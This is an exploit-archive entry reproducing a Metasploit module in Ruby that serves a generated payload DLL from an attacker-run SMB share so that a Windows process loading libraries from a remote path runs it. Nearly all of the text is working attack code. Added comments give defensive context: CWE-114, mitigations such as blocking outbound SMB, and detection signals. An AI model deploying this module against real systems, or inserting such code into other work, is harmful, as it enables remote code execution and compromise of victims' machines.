Generic DLL Injection From Shared Resource



EKU-ID: 4624 CVE: OSVDB-ID:
Author: Matthew Hall Published: 2015-03-05 Verified: Verified


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module that publishes a generated payload DLL on the framework's
# SMB share server (Msf::Exploit::Remote::SMB::Server::Share) so that a Windows
# process which loads libraries from a caller-controlled SMB path picks it up.
#
# The module only serves the file. Nothing in this class triggers the load, so
# the load condition has to exist elsewhere, which is presumably why it is
# ranked ManualRanking.
#
# Defensive context: the reference is CWE-114 (Process Control). The
# precondition is a process that can be made to load a DLL from a remote share.
# Commonly recommended mitigations are resolving libraries by fully qualified
# local path, constraining the DLL search path, and blocking outbound SMB
# (TCP 445) at the network egress. Image loads from UNC paths and outbound SMB
# sessions to unfamiliar hosts are useful detection signals.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Declares the module metadata and its options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with this
  #   module's own values through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Generic DLL Injection From Shared Resource',
      # The %q body is kept at its original columns so the string is unchanged.
      'Description' => %q{
        This is a general-purpose module for exploiting conditions where a DLL can be loaded
        from an specified SMB share. This module serves payloads as DLLs over an SMB service.
      },
      'Author' => ['Matthew Hall <hallm[at]sec-1.com>'],
      'References' => [['CWE', '114']],
      'DefaultOptions' => { 'EXITFUNC' => 'thread' },
      'Privileged' => false,
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X86_64],
      'Payload' => {
        'Space' => 2048,
        'DisableNops' => true
      },
      'Targets' => [
        ['Windows x86', { 'Arch' => ARCH_X86 }],
        ['Windows x64', { 'Arch' => ARCH_X86_64 }]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 04 2015'
    }
    super(update_info(info, module_info))

    # FILE_NAME is optional (required flag is false); setup picks a random
    # name when it is not set.
    share_name_option = OptString.new(
      'FILE_NAME',
      [false, 'DLL File name to share (Default: random .dll)']
    )
    register_options([share_name_option], self.class)

    # FILE_CONTENTS is hidden from the operator because setup always assigns
    # file_contents from the generated payload DLL.
    deregister_options('FILE_CONTENTS')
  end

  # Prepares the shared file before the share starts serving: sets the file
  # body to the generated payload DLL, chooses the file name, and prints the
  # UNC path the file is published under.
  def setup
    super

    self.file_contents = generate_payload_dll

    requested_name = datastore['FILE_NAME']
    # NOTE(review): only nil/false falls through to the random name; an empty
    # string is truthy in Ruby and would be used as the file name unchanged.
    self.file_name =
      if requested_name
        requested_name
      else
        # 4 + rand(3) gives a random stem of 4 to 6 alphabetic characters.
        random_stem = Rex::Text.rand_text_alpha(4 + rand(3))
        "#{random_stem}.dll"
      end

    # `unc` is not defined in this file; presumably supplied by the Share mixin.
    print_status("File available on #{unc}...")
  end

end